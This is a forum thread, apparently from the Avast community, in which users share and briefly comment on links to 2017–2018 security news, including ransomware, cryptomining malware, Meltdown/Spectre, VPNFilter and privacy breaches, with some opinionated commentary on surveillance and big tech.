somehow.
Big Guv Surveillance sp**ks, we thank you for doing that to the global Internet community over the years.
We owe you, we really do ::)
polonus
-
Firefox Prepares to Mark All HTTP Sites "Not Secure" After HTTPS Adoption Rises
https://www.bleepingcomputer.com/news/software/firefox-prepares-to-mark-all-http-sites-not-secure-after-https-adoption-rises/
-
Also see - https://forum.avast.com/index.php?topic=210852.msg1436360#msg1436360 (https://forum.avast.com/index.php?topic=210852.msg1436360#msg1436360), why bother with just http as https isn't guaranteed safe.
-
Hi DavidR & ehmen,
The reason for the https everywhere campaign by google and also now firefox could be that loads and loads of folks have insecure wifi access points to go onto connections out, and in that way could have a HTTP-drive-by-download injection launched against them quite easily. Read background: https://www.theguardian.com/technology/2017/oct/16/wpa2-wifi-security-vulnerable-hacking-us-government-warns
But do not take it for granted you are safe for big guv surveillance on https: ""There's now a thriving outsourced surveillance industry and they are there to meet the needs and wants of countries from around the world, including those who are more – and less – respectful to human rights."
polonus
-
Then be ready for sites that whilst using https to also get stung (insecure) if all of that content isn't https, the avast forums for instances. Some images, coming from http links, whilst this shouldn't be an issue for attached images as these are held within the forums https content.
So you could end up with one page being just fine and another getting pinged as insecure, this is likely to confuse users.
-
Hi DavidR,
The green padlock story, also is confusing to Joe and Jill Common from the average user base.
As long as there is mixed content while phasing out http,
and that is apparently what the big players want,
this will create a lot of confusion during the process.
If you want to change all that, do a good job of it and not half-heartedly,
like with all things on the Interwebs has been the case frequently.
Https and secure log-in and security headers implemented, no vulnerable nameservers anymore,
no more hosters that are in for the cheap money and less for security.
We have been in a patching full time circle from the start,
and what has this brought us from the turn of the century?
An infrastructure that looks more like a bandaged stuffed mummy full of plasters...
polonus
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
-
Another big scale brute force attack on Word Press sites going on.
In the past never that much of a success, but we still wanna warn against it:
https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack/
pol
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
I just approached Screencast-O-Matic since the screenshots are uploaded to an http site. My question was about changing to a secure server so that the pictures don't wind up being tagged as insecure.
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
I just approached Screencast-O-Matic since the screenshots are uploaded to an http site. My question was about changing to a secure server so that the pictures don't wind up being tagged as insecure.
I just received a reply:
Hello,
When you navigate to an uploaded screenshot link, it should redirect to https. We'll update the Recorder soon so that the link created in the clipboard is https as well.
-Sam
It certainly didn't take long. :)
-
300.000 Word Press sites vulnerable through holed Captcha Plug-in:
https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/
polonus
-
The involved botnet in these brute force attacks tries to install a cryptominer onto Word Press servers:
https://www.wordfence.com/blog/2017/12/massive-cryptomining-campaign-wordpress/
"Bitcoin the only coin whithout any social function"
polonus (volunteer website security analyst and website error-hunter)
-
Another 123 million American user data-breach from an Amazon S-3-Bucket.
Re: https://www.upguard.com/breaches/cloud-leak-alteryx
S-3-Buckets should be secure unless you configure them improperly.
It was not publicly available, building an AWS account to get access to a misconfigured Amazon-S-3-Bucket was easy-peasy
and made this big data-breach possible. The data mean solid gold for both identity thieves, spammers and black hat marketeers alike.
polonus
-
Rolling out Ubuntu 17.10 was halted, because it was corrupting the Lenovo computer bios.
Read: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1734147
Someone created a non-tested bug in a production release.
All ubuntu flaws, also mint, privacy technically have leaks & backdoors.
Related info on that bug:
https://www.howtogeek.com/226308/the-windows-platform-binary-table-why-crapware-can-come-back-after-a-clean-install/
polonus (volunteer website security analyst and website error-hunter)
-
Backdoor in three Word Press plug-ins detected:
https://www.wordfence.com/blog/2017/12/plugin-backdoor-supply-chain/
polonus
-
Starbucks Wi-Fi Turned People’s Laptops into Cryptocurrency Miners
http://news.softpedia.com/news/starbucks-wi-fi-turned-people-s-laptops-into-cryptocurrency-miners-518997.shtml (http://news.softpedia.com/news/starbucks-wi-fi-turned-people-s-laptops-into-cryptocurrency-miners-518997.shtml)
-
New but nothing new ;)
Another FaceBook virus >> http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/
-
The Need for Better Built-in Security in IoT Devices
http://blog.trendmicro.com/trendlabs-security-intelligence/iot-devices-need-better-builtin-security/
The Sound of a Targeted Attack
pdf.doc >> https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf
-
Chrome extension gave 105.000 users a crypto-miner:
https://productforums.google.com/forum/#!topic/chrome/b0JUzg4HYtI
Crypto mining a growing problem next to ad-launching and spamming.
The extension is still there ::)
polonus
-
Magento breach through helpdesk software:
http://gwillem.gitlab.io/2017/12/28/hackers-breach-magento-through-helpdesk/
pol
-
Your leaking privacy on Google etc. long gone out of the window...
will they ever do something about this or won't they even bother to consider it?
Read: https://www.theregister.co.uk/2017/10/10/leakybydesign_location_services_show_outsourced_security_wont_ever_work/
polonus
-
Personally never believed in security of browser password managers,
now webtrackers abuse them to track you all over the Interwebs. ::)
Read: https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
To solve this in firefox (old) - FF/PaleMoon users: 'about:config' > 'signon.autofillForms' > 'FALSE' [SOLVED]
polonus (volunteer website security analyst and website error-hunter)
-
A Huge Intel Security Hole Could Slow Down Your PC Soon
https://www.howtogeek.com/338269/a-huge-intel-security-hole-could-slow-down-your-pc-soon/
OS Makers Preparing Patches for Secret Intel CPU Security Bug
https://www.bleepingcomputer.com/news/security/os-makers-preparing-patches-for-secret-intel-cpu-security-bug/
Intel Denies Reports of Huge Performance Dip Due to Patches for CPU Security Bug
https://www.bleepingcomputer.com/news/hardware/intel-denies-reports-of-huge-performance-dip-due-to-patches-for-cpu-security-bug/
-
Protect yourself:
How to Check and Update Windows Systems for the Meltdown and Spectre CPU Flaws
https://www.bleepingcomputer.com/news/microsoft/how-to-check-and-update-windows-systems-for-the-meltdown-and-spectre-cpu-flaws/
List of Meltdown and Spectre Vulnerability Advisories, Patches, & Updates
https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/
Google: Almost All CPUs Since 1995 Vulnerable To "Meltdown" And "Spectre" Flaws
https://www.bleepingcomputer.com/news/security/google-almost-all-cpus-since-1995-vulnerable-to-meltdown-and-spectre-flaws/
Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks
https://www.bleepingcomputer.com/news/security/mozilla-confirms-web-based-execution-vector-for-meltdown-and-spectre-attacks/
-
Intel was aware of the chip vulnerability when its CEO sold off $24 million in company stock
http://www.businessinsider.com/intel-ceo-krzanich-sold-shares-after-company-was-informed-of-chip-flaw-2018-1
-
Mozilla's Firefox update tp patch against the Spectre attack:
https://www.mozilla.org/en-US/security/advisories/mfsa2018-01/
Never download unknown software from unknown sources and stay safer!
Up to the next hyped issue!
polonus
-
Crafty malware botnet infects Linux-servers via SSH with cryptominer to mine around 158 Monero.
Re: https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar
polonus
-
Open wifi hacking for fun and bitcoin mining:
https://forums.theregister.co.uk/forum/1/2018/01/05/wi_fi_crypto_mining/
The predictable script kiddie version of this attack can easily be detected by av,
that is why it has been published.
polonus
-
Open wifi hacking for fun and bitcoin mining:
https://forums.theregister.co.uk/forum/1/2018/01/05/wi_fi_crypto_mining/ (https://forums.theregister.co.uk/forum/1/2018/01/05/wi_fi_crypto_mining/)
The predictable script kiddie version of this attack can easily be detected by av,
that is why it has been published.
polonus
Since the value of Bitcoins just took a nosedive, wonder how long this will still be used. :)
-
Hi bob3160,
The whole bitcoin project was never to create a new currency with, to swap money easily around yes, could well be,
but the basics were a prelude to arrive at a new form of de-centralized Internet, the so-called "Golem Project".
As with the original Golem of Prague it matters who holds the "aleph" in the Hebrew word "emet" = truth,
when you take that off you are left with "met", meaning "dead", and the Golem returned to the dust,
it was created from and stiil can be found in the attic of the Alt-Nay עַל תְּנַא Schul in Prague.
Damian
-
Nvidia vid-cards Spectre vulnerable:
http://nvidia.custhelp.com/app/answers/detail/a_id/4611
polonus
-
Ad-industry keeps websites in the dark about privacy abuse!
Read this report: https://webtransparency.cs.princeton.edu/no_boundaries/session_replay_sites.html
Thousands of websites are sending all your keystrokes via replay-scripts, even with certain adblocking active.
Full list of abusers: https://webtransparency.cs.princeton.edu/no_boundaries/data/sr_site_list.csv.zip
See attached image.
So keep your visors up, block those that ignore your privacy and grab all of your data without consent.
polonus
-
@ Damien,
A new tool to try:
(https://screencast-o-matic.com/screenshots/u/Lh/1516216058239-79296.png)
https://www.grc.com/inspectre.htm
-
@ bob3160,
Steve came up with a new version of the tool. Tried it, it is good and settings stay undefined and restricted.
But alas there are two new attacks in the pipeline based on Spectre and Meltdown, called after the James Bond-films: "Skyfall"and "Solace". Particulars aren't known yet: https://skyfallattack.com/ & https://solaceattack.com/ both Mythic Beasts'domains from the UK (Google driven) on server s on UK and USA, Peter Stevens Cambridge. -> https://toolbar.netcraft.com/site_report?url=http://onza.mythic-beasts.com
pol
-
I'd like to place a security/spam warning.
How can I start a new topic here?
-
I'd like to place a security/spam warning.
How can I start a new topic here?
We are dealing with the spam as it's posted. Avast needs to come up with a permanent way to block spmmers from getting to the forum.
Unfortunately that may make it harder for new users to get to the forum.
-
desuCrypt Ransomware in the Wild with DEUSCRYPT and Decryptable Insane Variants
https://www.bleepingcomputer.com/news/security/desucrypt-ransomware-in-the-wild-with-deuscrypt-and-decryptable-insane-variants/ (https://www.bleepingcomputer.com/news/security/desucrypt-ransomware-in-the-wild-with-deuscrypt-and-decryptable-insane-variants/)
-
Rapid Ransomware Continues Encrypting New Files as they Are Created
https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/ (https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/)
Hacker Uses Malware to Steal Gas From Paying Customers
https://www.bleepingcomputer.com/news/security/hacker-uses-malware-to-steal-gas-from-paying-customers/ (https://www.bleepingcomputer.com/news/security/hacker-uses-malware-to-steal-gas-from-paying-customers/)
-
BlackMailware Found On Porn Site Threatens to Report Users are Spreading Child Porn
https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/ (https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/)
Blackmailware and Scare Tactics may be more efficient than Ransomware
-
Adware malvertising, the big threat of 2017 and still going strong:
Read: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
Mining a reason to keep your adblocker visors high inside your browser of choice!
One copuld also use an additional anti-miner extension.
polonus
-
Mozilla's apologies for errors made: https://blog.mozilla.org/firefox/retrospective-looking-glass/
polonus
-
Mozilla's apologies for errors made: https://blog.mozilla.org/firefox/retrospective-looking-glass/ (https://blog.mozilla.org/firefox/retrospective-looking-glass/)
polonus
It's always easy to realize that after you've gotten a black eye, that maybe you should have ducked. :)
-
Security Advisory for Flash Player | APSA18-01
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
-
WannaMine – new cryptocurrency malware exposes failings of traditional anti-virus tools
https://www.pandasecurity.com/mediacenter/mobile-news/wannamine-cryptomining-malware/ (https://www.pandasecurity.com/mediacenter/mobile-news/wannamine-cryptomining-malware/)
-
Malvertizing leads 500k victims to 90 bad Chrome Web Store extensions
https://www.cso.com.au/article/632897/
https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-chrome-extensions-found-chrome-web-store-form-droidclub-botnet/
-
System Cryptomix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/ (https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/)
With this version, when a file is encrypted by the ransomware, it will modify the filename and then append the .SYSTEM extension to encrypted file's name.
-
New JenX IoT DDoS Botnet Offered Part of Gaming Server Rental Scheme
https://www.bleepingcomputer.com/news/security/new-jenx-iot-ddos-botnet-offered-part-of-gaming-server-rental-scheme/ (https://www.bleepingcomputer.com/news/security/new-jenx-iot-ddos-botnet-offered-part-of-gaming-server-rental-scheme/)
-
Word Press update will break automatic update.:
https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/
Installs now should be performed manually. Note that nearly 30% of websites run the Word Press CMS:
https://w3techs.com/technologies/history_overview/content_management
polonus (volunteer website security analyst and website error-hunter)
-
Open tab phishing patched by DuckDuckGo, but Google will not patch it (because it supports Google's core business):
Read: https://sites.google.com/site/bughunteruniversity/nonvuln/phishing-with-window-opener
On that vulnerability: https://www.chaoswebs.net/blog/exploiting-window.opener.html (source credits: Kevin Forman)
polonus (volunteer website security analyst and website error-hunter)
-
Black Ruby Ransomware
https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/
-
Be warned, new TCP DOS vector disclosed, called TCP Starvation:
https://github.com/Eplox/TCP-Starvation (source: 9bd6ea1)
polonus
This critical flaw of TCP has been known since 2008, and more secure protocols, like RDP, were not much used
-
Olympic Destroyer, malware that was directed at the critical systems of the Olypic Wintergames,
now being analyzed:
http://blog.talosintelligence.com/2018/02/olympic-destroyer.html
polonus
-
Rapid Ransomware Being Spread Using Fake IRS Malspam
https://www.bleepingcomputer.com/news/security/rapid-ransomware-being-spread-using-fake-irs-malspam/
-
JavaScript Cryptomining Scripts Discovered in 19 Google Play Apps
https://www.bleepingcomputer.com/news/security/javascript-cryptomining-scripts-discovered-in-19-google-play-apps/
-
Telegram 0-Day Used to Spread Monero and Zcash Mining Malware
https://www.bleepingcomputer.com/news/security/telegram-0-day-used-to-spread-monero-and-zcash-mining-malware/
-
A mitigation with policy editor of an attack recently directed at Telegram users:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
About the attack: https://securelist.com/zero-day-vulnerability-in-telegram/83800/
polonus
-
Bingo, Amigo! Jackpotting: ATM malware from Latin America to the World
https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/
-
February Patch Tuesday Is a Bouquet of Fixes for Privilege Escalation Vulnerabilities
https://blog.trendmicro.com/trendlabs-security-intelligence/february-patch-tuesday-bouquet-fixes-privilege-escalation-vulnerabilities/
-
UK Formally Accuses Russian Military of NotPetya Ransomware Outbreak
https://www.bleepingcomputer.com/news/security/uk-formally-accuses-russian-military-of-notpetya-ransomware-outbreak/
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html (https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html)
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html (https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html)
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Interesting, since Google used 'Huawei' for the Google Nexus 6P and I have had mine for almost two years ;)
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html (https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html)
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Interesting, since Google used 'Huawei' for the Google Nexus 6P and I have had mine for almost two years ;)
What's important is to always be "Politically Correct". :) :) :)
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html (https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html)
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Does North Korea produce anything sold in US / Europe ? Do they make anything at all we want .... rice maybe
-
Multi-Stage Word Attack Infects Users Without Using Macros (infection with password stealer)
https://www.bleepingcomputer.com/news/security/multi-stage-word-attack-infects-users-without-using-macros/
-
New Saturn RaaS Lets Everyone Become a Ransomware Distributor for Free
https://www.bleepingcomputer.com/news/security/new-saturn-raas-lets-everyone-become-a-ransomware-distributor-for-free/
-
LockCrypt .1BTC Variant Installed Over Hacked Remote Desktop Services
https://www.bleepingcomputer.com/news/security/lockcrypt-1btc-variant-installed-over-hacked-remote-desktop-services/
-
Iranian Hackers Use New Trojan in Recent Attacks
https://www.securityweek.com/iranian-hackers-use-new-trojan-recent-attacks
SamSam Ransomware Hits Colorado DOT, Agency Shuts Down 2,000 Computers
https://www.bleepingcomputer.com/news/security/samsam-ransomware-hits-colorado-dot-agency-shuts-down-2-000-computers/
-
Data Keeper Ransomware Makes First Victims Two Days After Release on Dark Web RaaS
https://www.bleepingcomputer.com/news/security/data-keeper-ransomware-makes-first-victims-two-days-after-release-on-dark-web-raas/ (https://www.bleepingcomputer.com/news/security/data-keeper-ransomware-makes-first-victims-two-days-after-release-on-dark-web-raas/)
-
Russia Hacked Olympics Computers, Turned Blame on North Korea: Report
https://www.securityweek.com/russia-hacked-olympics-computers-turned-blame-north-korea-report
-
Ad Network Uses DGA Algorithm to Bypass Ad Blockers and Deploy In-Browser Miners
https://www.bleepingcomputer.com/news/security/ad-network-uses-dga-algorithm-to-bypass-ad-blockers-and-deploy-in-browser-miners/
-
New Mirai Variant Focuses on Turning IoT Devices into Proxy Servers
https://www.bleepingcomputer.com/news/security/new-mirai-variant-focuses-on-turning-iot-devices-into-proxy-servers/
-
Memcache Servers Can Be Abused for Insanely Massive DDoS Attacks
https://www.bleepingcomputer.com/news/security/memcache-servers-can-be-abused-for-insanely-massive-ddos-attacks/
-
Cryptocurrency-Mining Malware: 2018’s New Menace?
https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/
-
NOW Hackers Are Mining Crypto On Government Websites
https://futurism.com/hackers-mining-crypto-government-websites/
-
GitHub was hit by the most powerful DDoS attack in history
https://www.grahamcluley.com/github-hit-powerful-ddos-attack-history/
-
Cryptomining Gold Rush: One Gang Rakes In $7M Over 6 Months
https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/
-
GandCrab Ransomware Version 2 Released With New .Crab Extension & Other Changes
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/
-
Proof-of-Concept Code for Memcached DDoS Attacks Published Online
https://www.bleepingcomputer.com/news/security/proof-of-concept-code-for-memcached-ddos-attacks-published-online/
-
CIA exploits against mikrotik routers: https://securelist.com/apt-slingshot/84312/
Theater scene Africa and the Middle East.
Earlier also Mikrotik in Russia and Central Europe being attacked: https://forum.mikrotik.com/viewtopic.php?t=119255
Mikrotik in Poland found at Technical Universities and also as free open wifi in cities (EU project).
Why CIA Franfurt and Bucuresti are so interested to build exploits against it?
Because a lot of Mikrotik routers reside in Moscow for instance, and we have a new hot cyberwar going.
That is why Kaspersky's became banned from Anglo-American government devices.
Nothing is like it seems folks, no way.
polonus
-
Downloads loaded with bitcoin stealer: https://www.welivesecurity.com/2018/03/14/stealing-bitcoin-download-com/
polonus
-
BlackTDS Emerges as an As-a-Service Drive-By Kit for Malware Distribution
https://www.infosecurity-magazine.com/news/blacktds-emerges-as-an-as-a/
-
Zenis Ransomware Encrypts Your Data & Deletes Your Backups
https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/ (https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/)
VT-https://www.virustotal.com/#/file/9730e03ca9d052875895b4ad7ba7914f69009fd5fb58d324ee35d3e45f90d768/detection (https://www.virustotal.com/#/file/9730e03ca9d052875895b4ad7ba7914f69009fd5fb58d324ee35d3e45f90d768/detection)
-
Author of Polski, Vortex, and Flotera Ransomware Families Arrested in Poland
https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/ (https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/)
-
GrayKey iPhone unlocker poses serious security concerns
https://blog.malwarebytes.com/security-world/2018/03/graykey-iphone-unlocker-poses-serious-security-concerns/
-
(https://screencast-o-matic.com/screenshots/u/Lh/1521551988409-53976.png)
https://amdflaws.com/ (https://amdflaws.com/)
-
L.S.
How to leave their "Hotel Calefornia like services"
(seen in the light of the recent facebook Camebridge Analytica privacy databreach nightmare).
Best is to get unhooked from the habit of filling these monsters with all your data:
http://backgroundchecks.org/justdeleteme/
polonus
-
TrickBot Banking Trojan Gets Screenlocker Component
https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/
-
Drupal 7 and 8 core highly critical release on March 28th, 2018 PSA-2018-001
https://www.drupal.org/psa-2018-001
-
Top Security Execs at Google, Facebook, and Twitter Announce Departures
https://www.bleepingcomputer.com/news/security/top-security-execs-at-google-facebook-and-twitter-announce-departures/ (https://www.bleepingcomputer.com/news/security/top-security-execs-at-google-facebook-and-twitter-announce-departures/)
-
Child abuse imagery found within bitcoin's blockchain
https://www.theguardian.com/technology/2018/mar/20/child-abuse-imagery-bitcoin-blockchain-illegal-content
-
Child abuse imagery found within bitcoin's blockchain
https://www.theguardian.com/technology/2018/mar/20/child-abuse-imagery-bitcoin-blockchain-illegal-content (https://www.theguardian.com/technology/2018/mar/20/child-abuse-imagery-bitcoin-blockchain-illegal-content)
Amazing. :o :(
-
L.S.
How to leave their "Hotel Calefornia like services"
(seen in the light of the recent facebook Camebridge Analytica privacy databreach nightmare).
Best is to get unhooked from the habit of filling these monsters with all your data:
http://backgroundchecks.org/justdeleteme/
polonus
Next Step: https://www.reuters.com/article/us-facebook-cambridge-analytica-lawsuits/facebook-cambridge-analytica-sued-in-u-s-by-users-over-data-harvesting-idUSKBN1GX1XK (https://www.reuters.com/article/us-facebook-cambridge-analytica-lawsuits/facebook-cambridge-analytica-sued-in-u-s-by-users-over-data-harvesting-idUSKBN1GX1XK)
Thank you for the link above 'justdeleteme'.
-
City of Atlanta IT Systems Hit by SamSam Ransomware
https://www.bleepingcomputer.com/news/security/city-of-atlanta-it-systems-hit-by-samsam-ransomware/
-
GitLab Critical Security Release: 10.5.6, 10.4.6, and 10.3.9
https://about.gitlab.com/2018/03/20/critical-security-release-gitlab-10-dot-5-dot-6-released/
-
The AVCrypt Ransomware Tries To Uninstall Your AV Software
https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/
-
Why Google does not do a better job of keeping this crap and insecurity from their webstore?
Read and shiver: https://www.av-comparatives.org/mobile-security/
That's why we should stick to avast mobile security and their accompanying tools!
Be aware there is many an insecure dark alleyway on the Interwebs, folks 8) >:(
polonus
-
Same problem exists on Microsoft store and the Apple store.
-
Decrypters for Some Versions of Magniber Ransomware Released
https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/ (https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/)
-
New Matrix Ransomware Variants Installed Via Hacked Remote Desktop Services
https://www.bleepingcomputer.com/news/security/new-matrix-ransomware-variants-installed-via-hacked-remote-desktop-services/ (https://www.bleepingcomputer.com/news/security/new-matrix-ransomware-variants-installed-via-hacked-remote-desktop-services/)
Unfortunately, this variants of Matrix Ransomware cannot be decrypted for free.
-
Sometimes having Facebook Friends, isn't such a good idea.
https://bob3160.blogspot.com/2018/04/sometimes-having-facebook-friends-isnt.html (https://bob3160.blogspot.com/2018/04/sometimes-having-facebook-friends-isnt.html)
-
PowerHammer: Exfiltrating Data from Air-Gapped Computers through Power Lines
https://arxiv.org/abs/1804.04014
-
Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices
https://www.us-cert.gov/ncas/alerts/TA18-106A
-
Google is listening :o https://m.youtube.com/watch?v=zBnDWSvaQ1I
https://www.unilad.co.uk/technology/google-is-listening-to-everything-we-say-and-you-can-hear-it-back/
-
Google is listening :o https://m.youtube.com/watch?v=zBnDWSvaQ1I (https://m.youtube.com/watch?v=zBnDWSvaQ1I)
https://www.unilad.co.uk/technology/google-is-listening-to-everything-we-say-and-you-can-hear-it-back/ (https://www.unilad.co.uk/technology/google-is-listening-to-everything-we-say-and-you-can-hear-it-back/)
(https://screencast-o-matic.com/screenshots/u/Lh/1524518703167-9768.png)
https://privacy.google.com/#
It's always nice to know the whole story not just the headlines. :)
-
Websites with unpatched Drupal framework should consider themselves to be compromised.
See: https://github.com/rapid7/metasploit-framework/issues/9789
POC: https://github.com/nixawk/labs/issues/19
The hack is embroidering further on the schemes of a previous exploit dating back to 2014.
Always remember folks, there is nothing new in this ol' world, polonus has been long enough around to know,
the devil is always going to play out a variant of the same old trick. ;D :D
polonus (volunteer website security analyst and website error-hunter)
-
(https://screencast-o-matic.com/screenshots/u/Lh/1524835193272-76965.png)
https://blog.avast.com/amazon-hacked-for-ethereum-heist-and-new-security-laws-affect-uk-avast (https://blog.avast.com/amazon-hacked-for-ethereum-heist-and-new-security-laws-affect-uk-avast)
-
Keeping your account secure
https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html
-
A Vulnerability in 7-Zip Could Allow for Arbitrary Code Execution
https://www.cisecurity.org/advisory/a-vulnerability-in-7-zip-could-allow-for-arbitrary-code-execution_2018-049/
-
https://www.androidpolice.com/2018/05/02/google-amazon-closing-domain-fronting-loopholes-used-bypass-web-censorship/ (N.B. this link is being canvas fingerprinted for you, secure your last vestiges of online privacy).
First Google and now AWS (Amazon) close "domain fronting" service for Moxie Marlinspike's chat-app Signal.
For Google and AWS their core-business to Arab censorship states weighs heavier
than e2e encryption chat-app end-user security.
In the process we loose more and more of our Internet freedoms!
Als we need such large CDNs to facilitae "domain fronting", where to turn to now?
Now Signal developers have to look for other ways to circumvent state surveillance.
polonus
-
Also Microsoft announced to stop providing this technique to circumvent state surveillance.
Re: https://blog.torproject.org/domain-fronting-critical-open-web
Just the independant journalist that depends for his or her security on it (out on tor, signal etc.)
are placed at jeopardy, thanks to the Big Brother Big Imperium State sp**ks that want to hack, block
and oversee all and everything.
And Google, AWS & also Microsoft now even better facilitate them sp**ks
(however sometimes urged forcefully under gag order).
To-morrow will be our Dutch Liberation Day, but can we still celebrate to have a really free Internet
or should we all be fearful inside the online panopticum that sees and hears all? >:(
polonus
-
All twitter users are urged to change their passwords
A breach through a bug leaked all plain txt passwords, gold for password hackers!
https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html
polonus
-
Russia now blocks 50 vpn services as a Moscow court blocked access to the cloud-based instant messaging service Telegram in Russia. Google, Amazon and Microsoft now no longer will offer "domain fronting",
which also endangers users of tor and other similar software.
More:
http://tass.com/economy/1002762
We do not know what VPN services are affected.
polonus
-
In the line of this all: https://blog.torproject.org/domain-fronting-critical-open-web
polonus
-
Researchers find a very serious hole in PGP and S/MIME -
Journalists, political activists or whistleblowers are at risk!
And another time it is on the client-side!
What to trust and has everything now been thoroughly and utterly pn*wed by the Forces that Be?
Read: https://forums.theregister.co.uk/forum/1/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/
also very interesting read here: https://efail.de/
polonus (volunteer website security analyst and website error-hunter)
-
Microsoft Patch Tuesday for May Includes Updates for Actively-Exploited Vulnerabilities
https://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patch-tuesday-for-may-includes-updates-for-actively-exploited-vulnerabilities-2/
-
Malicious Traffic in Port 7001 Surges as Cryptominers Target Patched 2017 Oracle WebLogic Vulnerability
https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-traffic-in-port-7001-surges-as-cryptominers-target-patched-2017-oracle-weblogic-vulnerability/
-
Security updates available for Adobe Acrobat and Reader | APSB18-09
https://helpx.adobe.com/security/products/acrobat/apsb18-09.html
-
Hacking attempt on central.owncloud.org
https://central.owncloud.org/t/hacking-attempt-on-central-owncloud-org/13535
-
VPNFilter-malware infects 500.000 routers and NAS'es:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Vulnerable are Linksys, MikroTik, NETGEAR, TP-Link routers & Qnap built NAS.
Ukranian systems are being infested now like wildfire.
Providers are being asked to reset their customer's routers.
polonus
-
VMware Security Advisories - VMSA-2018-0013
https://www.vmware.com/security/advisories/VMSA-2018-0013.html
-
Pornhub launches its own VPN ;D
https://www.theverge.com/2018/5/24/17382144/pornhub-launches-vpn-vpnhub
https://thenextweb.com/apps/2018/05/25/pornhub-launches-a-vpn-for-discreet-browsing-on-mobile-and-desktop/
-
Next we'll have Facebook VPN :o
-
Next we'll have Facebook VPN :o
I didn't need Facebook. So I'm not interested in 'Facebook VPN'
-
VPNFilter-malware infects 500.000 routers and NAS'es:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Vulnerable are Linksys, MikroTik, NETGEAR, TP-Link routers & Qnap built NAS.
Ukranian systems are being infested now like wildfire.
Providers are being asked to reset their customer's routers.
polonus
VPNFilter: New Router Malware with Destructive Capabilities
